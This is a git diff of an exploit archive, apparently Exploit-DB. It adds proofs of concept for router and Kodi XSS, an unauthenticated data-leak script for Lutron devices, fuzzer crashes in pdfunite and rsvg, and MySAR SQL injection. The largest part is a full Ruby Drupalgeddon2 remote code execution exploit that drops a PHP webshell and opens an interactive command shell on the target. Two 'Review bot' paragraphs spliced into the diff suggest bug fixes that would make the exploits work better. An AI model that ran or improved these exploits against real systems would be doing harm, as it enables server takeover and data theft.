diff --git a/exploits/hardware/webapps/44320.txt b/exploits/hardware/webapps/44320.txt
new file mode 100644
index 000000000..09a3261f6
--- /dev/null
+++ b/exploits/hardware/webapps/44320.txt
@@ -0,0 +1,26 @@
+######################################################################################
+# Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting (XSS)
+# Date: 2018-03-18
+# Exploit Author: Sayan Chatterjee
+# Vendor Homepage: http://en.coship.com/
+# Category: Hardware (Wifi Router)
+# Version: 4.0.0.48
+# Tested on: Windows 10
+# CVE: CVE-2018-8772
+#######################################################################################
+
+Proof of Concept
+=================
+URL: http://192.168.1.254 (Wifi Router Gateway)
+Attack Vector : Network Name(SSID)
+Payload :
+
+Reproduction Steps:
+------------------------------
+1. Access the wifi router gateway [i.e, http://192.168.1.254]
+2. Go to "Wireless Setting" -> "Basic"
+3. Update "Network Name(SSID)" field with ''
+4. Save the settings.
+5. Go to "System Status" and you will be having "S@Y@N" popup.
+
+#######################################################################################
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44488.py b/exploits/hardware/webapps/44488.py
new file mode 100755
index 000000000..5dabe1804
--- /dev/null
+++ b/exploits/hardware/webapps/44488.py
@@ -0,0 +1,69 @@
+'''
+
+# Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware
+# Date: 20-03-2018
+# Exploit Author: David Castro
+# Contact: https://twitter.com/SadFud75
+# Vendor Homepage: http://www.lutron.com
+# Software Link: http://www.lutron.com/en-US/Products/Pages/WholeBuildingSystems/Quantum/Overview.aspx
+# Version: Lutron Quantum 2.0 - 3.2.243 firmware
+# CVE : CVE-2018-8880
+# Shodan dork: html:"

LUTRON

"
+
+Python 2.7 Output:
+
+Leaking data from HOST
+[+] Device info:
+
+MAC: 000FE702A999
+PRODUCT FAMILY: Gulliver
+PRODUCT TYPE: Processor
+SERIAL NUMBER: 007B24B4
+GUID: 0DFB959BD0D8784DA9501B958F099779
+CODE VERSION: 7.5.0
+
+[+] Network info:
+
+INTERNAL IP: 192.168.0.2
+SUBNET MASK: 255.255.255.0
+GATEWAY: 192.168.0.1
+TELNET PORT: 23
+FTP PORT: 21
+REMOTE PORT: 51023
+
+[+] Done.
+
+'''
+
+
+import requests
+from bs4 import BeautifulSoup
+
+ip = raw_input("Enter target ip: ")
+port = raw_input("Enter target port: ")
+
+print 'Leaking data from ' + 'http://' + ip + ":" + port
+r = requests.get('http://' + ip + ":" + port + '/deviceIP')
+resultado = r.text
+parseado = BeautifulSoup(resultado, "lxml")
+
+print '[+] Device info:'
+print ''
+print 'MAC: ' + parseado.find('input', {'name': 'MacAddr'}).get('value')
+print 'PRODUCT FAMILY: ' + parseado.find('input', {'name': 'PRODFAM'}).get('value')
+print 'PRODUCT TYPE: ' + parseado.find('input', {'name': 'PRODTYPE'}).get('value')
+print 'SERIAL NUMBER: ' + parseado.find('input', {'name': 'SERNUM'}).get('value')
+print 'GUID: ' + parseado.find('input', {'name': 'GUID'}).get('value')
+print 'CODE VERSION: ' + parseado.find('input', {'name': 'CODEVER'}).get('value')
+print ''
+print '[+] Network info:'
+print ''
+print 'INTERNAL IP: ' + parseado.find('input', {'name': 'IPADDR'}).get('value')
+print 'SUBNET MASK: ' + parseado.find('input', {'name': 'SUBNETMK'}).get('value')
+print 'GATEWAY: ' + parseado.find('input', {'name': 'GATEADDR'}).get('value')
+print 'TELNET PORT: ' + parseado.find('input', {'name': 'TELPORT'}).get('value')
+print 'FTP PORT: ' + parseado.find('input', {'name': 'FTPPORT'}).get('value')
+print 'REMOTE PORT: ' + parseado.find('input', {'name': 'REMOTEPORT'}).get('value')
+print ''
+print '[+] Done.'
+print ''
\ No newline at end of file
diff --git a/exploits/linux/dos/44490.txt b/exploits/linux/dos/44490.txt
new file mode 100644
index 000000000..3599abc0c
--- /dev/null
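Review bot: The header calls this a "Login bypass and data leak", but the body performs a single unauthenticated GET of `/deviceIP` and prints the values of named `<input>` elements, so the docstring should state that this is what the PoC demonstrates and which endpoint an operator needs to restrict; a comment above the request such as `# Unauthenticated GET of /deviceIP; the page exposes device and network settings as input values` would make that explicit. The `requests.get` call carries no `timeout=`, so a host that accepts the connection but never answers hangs the script indefinitely. Each `parseado.find(...).get('value')` chain also assumes every field is present; when one is missing the script dies with an `AttributeError` on `None` rather than reporting which field was absent.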
+++ b/exploits/linux/dos/44490.txt 
@@ -0,0 +1,68 @@
+# Exploit Title: PDFunite Malformed pdf buffer overflow
+# Date: 17 April 2018
+# Exploit Author: Hamm3r.py
+# Vendor Homepage: https://launchpad.net/ubuntu/artful/+package/poppler-utils
+# Software Link: https://launchpad.net/ubuntu/+source/poppler/0.57.0-2ubuntu4.2
+# Version: 0.41.0
+# Tested on: Ubuntu
+# CVE :
+
+pdfunite is a part of poppler package in ubuntu. pdfunite is prone to a
+local bufferoverflow when a malformed pdf is used to unite with another
+pdf.
+Following is the gdb stack trace:
+
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
+/usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#0 0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
+/usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#1 0x00007ffff7aa8867 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#2 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#3 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#4 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#5 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#6 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#7 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int,
int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#8 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#9 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#10 0x00007ffff7aa8bae in PDFDoc::markPageObjects(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#11 0x000000000040271a in ?? ()
+#12 0x00007ffff722d830 in __libc_start_main (main=0x401b20, argc=4,
+argv=0x7fffffffe0b8, init=, fini=,
+rtld_fini=, stack_end=0x7fffffffe0a8) at
+../csu/libc-start.c:291
+#13 0x0000000000403179 in ?? ()
+
+
+$ pdfunite -v
+pdfunite version 0.41.0
+
+
+#This issue is identified by Hamm3r.py, a general purpose fuzzer!
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44490.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/44491.txt b/exploits/multiple/dos/44491.txt
new file mode 100644
index 000000000..1dd65fabb
--- /dev/null
+++ b/exploits/multiple/dos/44491.txt
@@ -0,0 +1,100 @@
+# Exploit Title: Buffer-overflow in RSVG while converting a malformed svg
+# Date: 17 April 2018
+# Exploit Author: Hamm3r.py
+# Vendor Homepage: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
+# Software Link: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
+# Version: Ubuntu: 2.40.13 (Default version that is shipped with ubuntu) and MAC 2.42.2
+# Tested on: Ubuntu 16.04 and MAC 10.13.3
+
+
+RSVG throws a segmentation fault when malformed SVG is submitted as input.
+
+Steps to reproduce:
+rsvg test.png
+
+
+GDB Stacktrace below:
+Starting program: /usr/bin/rsvg fuzzed_fdiA0xdf5OQPYsN hello.png
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+_fill_xrgb32_lerp_opaque_spans (abstract_renderer=0x7fffffffbea0, y=18219,
+h=1, spans=,
+num_spans=) at
+../../../../src/cairo-image-compositor.c:2249
+2249 ../../../../src/cairo-image-compositor.c: No such file or directory.
+(gdb) backtrace
+#0 0x00007ffff6fd35c0 in _fill_xrgb32_lerp_opaque_spans
+(abstract_renderer=0x7fffffffbea0, y=18219, h=1, spans=,
+num_spans=) at ../../../../src/cairo-image-compositor.c:2249
+#1 0x00007ffff7017921 in _cairo_tor_scan_converter_generate (xmax=248,
+xmin=192, height=1, y=18219, spans=0x63e438, renderer=0x7fffffffbea0,
+cells=)
+at ../../../../src/cairo-tor-scan-converter.c:1643
+#2 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
+(renderer=0x7fffffffbea0, antialias=1, winding_mask=,
+converter=) at
+../../../../src/cairo-tor-scan-converter.c:1794
+#3 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
+(converter=0x63d3b0, renderer=0x7fffffffbea0)
+at ../../../../src/cairo-tor-scan-converter.c:1857
+#4 0x00007ffff7009c33 in composite_polygon
+(extents=extents@entry=0x7fffffffd780,
+polygon=polygon@entry=0x7fffffffd360,
+fill_rule=fill_rule@entry=CAIRO_FILL_RULE_WINDING,
+antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT,
+compositor=0x7ffff72b2040 , compositor=0x7ffff72b2040 )
+at ../../../../src/cairo-spans-compositor.c:801
+#5 0x00007ffff700a6a5 in clip_and_composite_polygon
+(compositor=compositor@entry=0x7ffff72b2040 ,
+extents=extents@entry=0x7fffffffd780,
+polygon=polygon@entry=0x7fffffffd360, fill_rule=CAIRO_FILL_RULE_WINDING,
+antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT) at
+../../../../src/cairo-spans-compositor.c:967
+#6 0x00007ffff700b5d3 in _cairo_spans_compositor_fill
+(_compositor=0x7ffff72b2040 , extents=0x7fffffffd780,
+path=, fill_rule=CAIRO_FILL_RULE_WINDING,
+tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT) at
+../../../../src/cairo-spans-compositor.c:1174
+#7 0x00007ffff6fc5a90 in _cairo_compositor_fill (compositor=0x7ffff72b2040
+, surface=0x6399a0, op=, source=,
+path=0x639768, fill_rule=CAIRO_FILL_RULE_WINDING,
+tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0)
+at ../../../../src/cairo-compositor.c:203
+#8 0x00007ffff6fd7127 in _cairo_image_surface_fill
+(abstract_surface=, op=, source=, path=, fill_rule=, tolerance=, antialias=, clip=0x0) at
+../../../../src/cairo-image-surface.c:985
+#9 0x00007ffff700e7d7 in _cairo_surface_fill (surface=0x6399a0,
+op=CAIRO_OPERATOR_OVER, source=0x7fffffffdb50, path=0x639768,
+fill_rule=CAIRO_FILL_RULE_WINDING, tolerance=0.10000000000000001,
+antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0) at
+../../../../src/cairo-surface.c:2341
+#10 0x00007ffff6fce14c in _cairo_gstate_fill (gstate=0x630c00,
+path=path@entry=0x639768)
+at ../../../../src/cairo-gstate.c:1317
+#11 0x00007ffff6fc7279 in _cairo_default_context_fill (abstract_cr=0x639400)
+at ../../../../src/cairo-default-context.c:1055
+#12 0x00007ffff6fc02b5 in cairo_fill (cr=0x639400) at
+../../../../src/cairo.c:2205
+#13 0x00007ffff7bc9e95 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#14 0x00007ffff7bc6272 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#15 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#16 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#17 0x00007ffff7bbd982 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#18 0x00007ffff7bbe298 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#19 0x00007ffff7bca9e3 in rsvg_handle_render_cairo_sub () at
+/usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+
+
+Version:
+$rsvg-convert --version
+rsvg-convert version 2.42.2
+
+#This issue is identified by Hamm3r.py, a general purpose fuzzer!
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44491.zip
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44487.txt b/exploits/multiple/webapps/44487.txt
new file mode 100644
index 000000000..a1267a293
--- /dev/null
+++ b/exploits/multiple/webapps/44487.txt
@@ -0,0 +1,82 @@
+=============================================
+MGC ALERT 2018-003
+- Original release date: March 19, 2018
+- Last revised: April 16, 2018
+- Discovered by: Manuel Garcia Cardenas
+- Severity: 4,8/10 (CVSS Base Score)
+- CVE-ID: CVE-2018-8831
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Kodi <= 17.6 - Persistent Cross-Site Scripting
+
+II. BACKGROUND
+-------------------------
+Kodi (formerly XBMC) is a free and open-source media player software
+application developed by the XBMC Foundation, a non-profit technology
+consortium. Kodi is available for multiple operating systems and hardware
+platforms, with a software 10-foot user interface for use with televisions
+and remote controls.
+
+III. DESCRIPTION
+-------------------------
+Has been detected a Persistent XSS vulnerability in the web interface of
+Kodi, that allows the execution of arbitrary HTML/script code to be
+executed in the context of the victim user's browser.
+
+IV. PROOF OF CONCEPT
+-------------------------
+Go to: Playlist -> Create
+
+Create a playlist injecting javascript code:
+
+
+
+The XSS is executed, in the victim browser.
+
+V. BUSINESS IMPACT
+-------------------------
+An attacker can execute arbitrary HTML or script code in a targeted user's
+browser, this can leverage to steal sensitive information as user
+credentials, personal data, etc.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Kodi <= 17.6
+
+VII. SOLUTION
+-------------------------
+Vendor include the fix:
+https://trac.kodi.tv/ticket/17814
+
+VIII. REFERENCES
+-------------------------
+https://kodi.tv/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+March 19, 2018 1: Initial release
+April 16, 2018 2: Last revision
+
+XI.
DISCLOSURE TIMELINE
+-------------------------
+March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
+March 19, 2018 2: Send to vendor
+March 30, 2018 3: Vendo fix
+April 16, 2018 4: Sent to lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb
index b9a1bda11..e476524c6 100755
--- a/exploits/php/webapps/44449.rb
+++ b/exploits/php/webapps/44449.rb
@@ -1,27 +1,10 @@
 #!/usr/bin/env ruby
 #
-# Hans Topo & g0tmi1k's ruby port of Drupalggedon2 exploit ~ https://github.com/dreadlocked/Drupalgeddon2/ (EDBID: 44449 ~ https://www.exploit-db.com/exploits/44449/)
-# Based on Vitalii Rudnykh exploit ~ https://github.com/a2u/CVE-2018-7600 (EDBID: 44448 ~ https://www.exploit-db.com/exploits/44448/)
-# Hans Topo ~ https://github.com/dreadlocked
-# g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
+# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
 #
-# Drupal Advisory ~ https://www.drupal.org/sa-core-2018-002
-# Vulnerable Versions:
-# < 7.58
-# 8.x < 8.3.9
-# 8.4.x < 8.4.6 (TESTED)
-# 8.5.x < 8.5.1 (TESTED)
-#
-# WriteUp & Thx ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/
-# REF phpinfo() ~ https://twitter.com/i_bo0om/status/984674893768921089 (curl - user/register - mail - #post_render)
-# REF phpinfo() ~ https://twitter.com/RicterZ/status/984495201354854401 (burp - user//edit [requires auth] - mail - #lazy_builder)
-# REF 2x RCE ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708 (curl - user/register - mail & timezone - #lazy_builder & #post_render)
-# REF RCE ~ https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384 (curl - user/register - mail - #post_render)
-# REF rev_nc ~ https://gist.github.com/AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 (curl - user/register - mail - #post_render)
-# Collection ~ https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
-#
-#
-# Drupal Version ~ https://example.com/CHANGELOG.txt
+# Authors:
+# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
+# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
 #
@@ -29,114 +12,297 @@
 require 'base64'
 require 'json'
 require 'net/http'
 require 'openssl'
+require 'readline'
-# Proxy information (nil to disable)
+# Settings - Proxy information (nil to disable)
 proxy_addr = nil
 proxy_port = 8080
-# Quick how to use
-if ARGV.empty?
- puts "Usage: ruby drupalggedon2.rb "
- puts " ruby drupalgeddon2.rb https://example.com whoami"
- exit
+# Settings - General
+$useragent = "drupalgeddon2"
+webshell = "s.php"
+writeshell = true
+
+
+# Settings - Payload (we could just be happy without this, but we can do better!)
+#bashcmd = "'
+bashcmd = "&1' ); }"
+bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Function http_post [post]
+def http_post(url, payload="")
+ uri = URI(url)
+ request = Net::HTTP::Post.new(uri.request_uri)
+ request.initialize_http_header({"User-Agent" => $useragent})
+ request.body = payload
+ return $http.request(request)
 end
+
+# Function gen_evil_url
+def gen_evil_url(evil, feedback=true)
+ # PHP function to use (don't forget about disabled functions...)
+ phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
+
+ #puts "[*] PHP cmd: #{phpmethod}" if feedback
+ puts "[*] Payload: #{evil}" if feedback
+
+ ## Check the version to match the payload
+ # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
+ if $drupalverion.start_with?('8')
+ # Method #1 - Drupal 8, mail, #post_render - response is 200
+ url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+ payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
+
+ # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
+ #url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+ #payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
+ elsif $drupalverion.start_with?('7')
+ # Method #3 - Drupal 7, name, #post_render - response is 200
+ url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
+ payload = "form_id=user_pass&_triggering_element_name=name"
+ else
+ puts "[!] Unsupported Drupal version"
+ exit
+ end
+
+ # Drupal v7 needs an extra value from a form
+ if $drupalverion.start_with?('7')
+ response = http_post(url, payload)
+
+ form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
+ puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
+
+ #url = $target + "file/ajax/name/%23value/" + form_build_id
+ url = $target + "?q=file/ajax/name/%23value/" + form_build_id
+ payload = "form_build_id=" + form_build_id
+ end
+
+ return url, payload
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Quick how to use
+if ARGV.empty?
+ puts "Usage: ruby drupalggedon2.rb "
+ puts " ruby drupalgeddon2.rb https://example.com"
+ exit
+end
 # Read in values
-target = ARGV[0]
-command = ARGV[1]
+$target = ARGV[0]
+
+
+# Check input for protocol
+if not $target.start_with?('http')
+ $target = "http://#{target}"
+end
+# Check input for the end
+if not $target.end_with?('/')
+ $target += "/"
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 # Banner
 puts "[*] --==[::#Drupalggedon2::]==--"
 puts "-"*80
+puts "[*] Target : #{$target}"
+puts "[*] Write?
: Skipping writing web shell" if not writeshell
+puts "-"*80
-# Check input for protocol
-if not target.start_with?('http')
- target = "http://" + target
-end
-
-# Check input for the end
-if not target.end_with?('/')
- target += "/"
-end
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-# Payload
-#evil = 'uname -a'
-evil = ''
-evil = "echo " + Base64.encode64(evil).strip + " | base64 -d | tee s.php"
+# Setup connection
+uri = URI($target)
+$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-# PHP function to use
-phpmethod = 'exec'
-
-
-# Feedback
-puts "[*] Target : " + target
-puts "[*] Command: " + command
-puts "[*] PHP cmd: " + phpmethod
-
-
-# Method #1 - timezone & lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
-#url = target + 'user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
-# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
-#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
-
-
-# Method #2 - mail & post_render - response is 200
-url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
-# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
-payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
-
-
-uri = URI(url)
-http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-
 # Use SSL/TLS if needed
-if uri.scheme == 'https'
- http.use_ssl = true
- http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+if uri.scheme == "https"
+ $http.use_ssl = true
+ $http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Try and get version
+$drupalverion = nil
+# Possible
URLs
+url = [
+ $target + "CHANGELOG.txt",
+ $target + "core/CHANGELOG.txt",
+ $target + "includes/bootstrap.inc",
+ $target + "core/includes/bootstrap.inc",
+]
+# Check all
+url.each do|uri|
+ # Check response
+ response = http_post(uri)
+
+ if response.code == "200"
+ puts "[+] Found : #{uri} (#{response.code})"
+
+ # Patched already?
+ puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
+
+ # Try and get version from the file contents
+ $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
+
+ # If not, try and get it from the URL
+ $drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
+
+ # Done!
+ break
+ elsif response.code == "403"
+ puts "[+] Found : #{uri} (#{response.code})"
+
+ # Get version from URL
+ $drupalverion = uri.match(/core/)? "8.x" : "7.x"
+ else
+ puts "[!] MISSING: #{uri} (#{response.code})"
+ end
 end
-# Make the request
-req = Net::HTTP::Post.new(uri.request_uri)
-req.body = payload
 # Feedback
-puts "[*] Payload: " + evil
-#puts "[*] Sending: " + payload
-puts "-"*80
-
-
-# Check response
-response = http.request(req)
-if response.code == "200"
- puts "[+] Target seems to be exploitable! w00hooOO!"
- puts "[+] Result: " + JSON.pretty_generate(JSON[response.body] )
+if $drupalverion
+ status = $drupalverion.end_with?('x')? "?" : "!"
+ puts "[+] Drupal#{status}: #{$drupalverion}"
 else
- puts "[!] Target does NOT seem to be exploitable ~ Response: " + response.code
- #exit
+ puts "[!] Didn't detect Drupal version"
+ puts "[!] Forcing Drupal v8.x attack"
+ $drupalverion = "8.x"
 end
-
-
-# Feedback
-puts "-"*80
-puts "[*] curl '" + target + "s.php?c=#{command}'"
 puts "-"*80
-# Now run our command
-exploit_uri = URI(target + "s.php?c=#{command}")
-# Check response
-response = Net::HTTP.get_response(exploit_uri)
-if response.code != "200"
- puts "[!]
Exploit FAILED ~ Response: " + response.code
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+
+# Make a request, testing code execution
+puts "[*] Testing: Code Execution"
+# Generate a random string to see if we can echo it
+random = (0...8).map { (65 + rand(26)).chr }.join
+url, payload = gen_evil_url("echo #{random}")
+response = http_post(url, payload)
+if response.code == "200" and not response.body.empty?
+ #result = JSON.pretty_generate(JSON[response.body])
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ puts "[+] Result : #{result}"
+
+ puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
+else
+ puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
 exit
 end
+puts "-"*80
-# Result
-puts "[+] Output: " + response.body
\ No newline at end of file
+# Location of web shell & used to signal if using PHP shell
+webshellpath = nil
+prompt = "drupalgeddon2"
+# Possibles paths to try
+paths = [
+ "./",
+ "./sites/default/",
+ "./sites/default/files/",
+]
+# Check all
+paths.each do|path|
+ puts "[*] Testing: File Write To Web Root (#{path})"
+
+ # Merge locations
+ webshellpath = "#{path}#{webshell}"
+
+ # Final command to execute
+ cmd = "#{bashcmd} | tee #{webshellpath}"
+
+ # Generate evil URLs
+ url, payload = gen_evil_url(cmd)
+ # Make the request
+ response = http_post(url, payload)
+ # Check result
+ if response.code == "200" and not response.body.empty?
+ # Feedback
+ #result = JSON.pretty_generate(JSON[response.body])
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ puts "[+] Result : #{result}"
+
+ # Test to see if backdoor is there (if we managed to write it)
+ response = http_post("#{$target}#{webshellpath}", "c=hostname")
+ if response.code == "200" and not response.body.empty?
+ puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
+ break
+ else
+ puts "[!] Target is NOT exploitable. No write access here!"
+ end
+ else
+ puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
+ end
+ webshellpath = nil
+end if writeshell
+puts "-"*80 if writeshell
+
+if webshellpath
+ # Get hostname for the prompt
+ prompt = response.body.to_s.strip
+
+ # Feedback
+ puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'"
+elsif writeshell
+ puts "[!] FAILED to find writeable folder"
+ puts "[*] Dropping back to ugly shell..."
+end
+
+
+# Stop any CTRL + C action ;)
+trap("INT", "SIG_IGN")
+
+
+# Forever loop
+loop do
+ # Default value
+ result = "ERROR"
+
+ # Get input
+ command = Readline.readline("#{prompt}>> ", true).to_s
+
+ # Exit
+ break if command =~ /exit/
+
+ # Blank link?
+ next if command.empty?
+
+ # If PHP shell
+ if webshellpath
+ # Send request
+ result = http_post("#{$target}#{webshell}", "c=#{command}").body
+ # Direct commands
+ else
+ url, payload = gen_evil_url(command, false)
+ response = http_post(url, payload)
+ if response.code == "200" and not response.body.empty?
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ end
+ end
+
+ # Feedback
+ puts result
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/44483.txt b/exploits/php/webapps/44483.txt
new file mode 100644
index 000000000..9719a5d12
--- /dev/null
+++ b/exploits/php/webapps/44483.txt
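Review bot: The scheme check `$target = "http://#{target}"` interpolates `target`, a name that no longer exists in the new code (the old local was replaced by the global `$target`), so an argument given without a scheme raises a NameError instead of being prefixed; it should read `$target = "http://#{$target}"`. In the version-detection loop, the "Might be patched" warning interpolates `#{url}`, which is the whole array of candidate URLs, where `#{uri}` (the element being checked, as used in the surrounding `puts` lines) was evidently intended. In the final loop, `break if command =~ /exit/` matches any input merely containing that substring, so a longer command that happens to contain "exit" silently ends the session; `break if command.strip == "exit"` is what the `# Exit` comment describes. The earlier hunk of this file only rewrites the header comment.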
@@ -0,0 +1,24 @@
+# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
+# Date: 14-13-2018
+# Software Link: https://sourceforge.net/projects/mysar/
+# Exploit Author: Keerati T.
+# Version: 2.1.4
+# Tested on: Linux
+
+1. Description
+SQL injection and Cross site script vulnerabilities are found on ALL
+parameter of MySAR.
+
+2. Proof of Concept
+FOR EXAMPLE
+- SQL injection
+http://server/mysar/index.php?a=IPSummary&date=[SQLi]
+-XSS
+http://server/mysar/index.php?a=IPSummary&date=2018-04-14
